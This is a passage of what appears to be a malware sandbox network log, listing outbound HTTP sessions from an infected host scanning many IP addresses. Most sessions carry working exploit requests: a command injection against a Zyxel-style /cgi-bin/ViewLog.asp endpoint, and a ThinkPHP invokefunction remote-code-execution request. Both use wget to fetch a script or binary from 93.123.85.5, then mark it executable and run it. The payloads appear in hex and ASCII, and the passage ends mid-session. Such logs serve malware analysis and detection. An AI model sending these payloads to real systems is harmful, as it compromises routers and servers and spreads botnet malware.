                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              245192.168.2.233510262.29.2.368080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:46.151091099 CET5755OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              246192.168.2.235236094.122.18.1228080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:46.151113033 CET5755OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              247192.168.2.234183694.120.2.1308080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:46.152556896 CET5756OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              248192.168.2.234331295.57.140.5580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:46.160820961 CET5756OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:46.534806967 CET5766INHTTP/1.1 200 OK
                                                              Nov 13, 2023 22:18:46.534982920 CET5767INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                              Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              249192.168.2.235398695.156.92.9880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:46.189640999 CET5758OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:46.592808962 CET5768INHTTP/1.0 401 Unauthorized
                                                              Content-Type: text/html
                                                              Server: httpd
                                                              Date: Thu, 15 Jan 1970 19:52:01 GMT
                                                              Connection: close
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Cache-Control: post-check=0, pre-check=0
                                                              Pragma: no-cache
                                                              WWW-Authenticate: Basic realm="inet"
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 48 34 3e 0a 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 72 65 71 75 69 72 65 64 2e 20 70 6c 65 61 73 65 20 6e 6f 74 65 20 74 68 61 74 20 74 68 65 20 64 65 66 61 75 6c 74 20 75 73 65 72 6e 61 6d 65 20 69 73 20 22 72 6f 6f 74 22 20 69 6e 20 61 6c 6c 20 6e 65 77 65 72 20 72 65 6c 65 61 73 65 73 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>Authorization required. please note that the default username is "root" in all newer releases</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              25192.168.2.234894688.198.156.23580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:11.093945980 CET1524OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:11.398169994 CET1533INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:11 GMT
                                                              Server: Apache
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              250192.168.2.235286688.119.174.580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:46.276968956 CET5759OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:46.470912933 CET5765INHTTP/1.1 400 Bad Request
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 681
                                                              date: Mon, 13 Nov 2023 21:18:46 GMT
                                                              server: LiteSpeed
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              251192.168.2.234392262.28.147.148080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:46.388762951 CET5761OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:46.697547913 CET5773INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 20:06:45 GMT
                                                              Server: Apache
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              252192.168.2.233960294.120.153.1818080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:46.423208952 CET5762OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              253192.168.2.235517094.122.105.1318080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:46.433526039 CET5763OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              25495.156.92.9880192.168.2.2354012
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:46.994138956 CET5867INHTTP/1.0 400 Bad Request
                                                              Content-Type: text/html
                                                              Server: httpd
                                                              Date: Thu, 15 Jan 1970 19:52:02 GMT
                                                              Connection: close
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Cache-Control: post-check=0, pre-check=0
                                                              Pragma: no-cache
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              255192.168.2.235554062.97.114.2138080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:47.385768890 CET5876OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              256192.168.2.235034085.214.250.1768080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:47.385890961 CET5876OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:47.696796894 CET5892INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:47 GMT
                                                              Server: Apache
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip
                                                              Content-Length: 189
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 55 8e 4b 0f 82 30 10 84 ef fc 8a 95 bb 2c 1a 8f 4d 0f 3c 8c 24 a8 c4 d4 03 c7 62 9b 40 82 14 fb d0 f8 ef 6d e1 e4 65 92 d9 f9 76 67 c9 a6 b8 e6 ac 6d 4a 38 b1 73 0d cd 3d ab ab 1c e2 2d 62 55 b2 23 62 c1 8a 35 d9 27 29 62 79 89 69 44 7a fb 1c 29 e9 25 17 de d8 c1 8e 92 1e d2 14 32 2e e0 26 5f 4e 1a 4b 70 1d 47 04 17 8c 74 4a 7c c3 e6 8e fe 51 de 47 64 a6 ad 72 1a 3a ad 3e 46 6a 30 72 b2 c0 41 af 0c d8 9e 07 19 8c 0f f4 db e7 0f e5 46 01 93 b2 e0 26 21 b5 b1 7c 12 09 e9 34 60 a8 9b 83 2c 6d fe 7a f8 33 fa 01 ce 5b 1b f3 e2 00 00 00
                                                              Data Ascii: UK0,M<$b@mevgmJ8s=-bU#b5')byiDz)%2.&_NKpGtJ|QGdr:>Fj0rAF&!|4`,mz3[


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              257192.168.2.236078231.136.130.2558080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:47.403757095 CET5877OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:48.399195910 CET5997OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:50.382946968 CET6246OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:54.542380095 CET6733OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:02.477366924 CET7699OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:18.347234964 CET9694OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:50.855043888 CET13753OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              258192.168.2.234145062.29.42.2098080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:47.417216063 CET5877OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
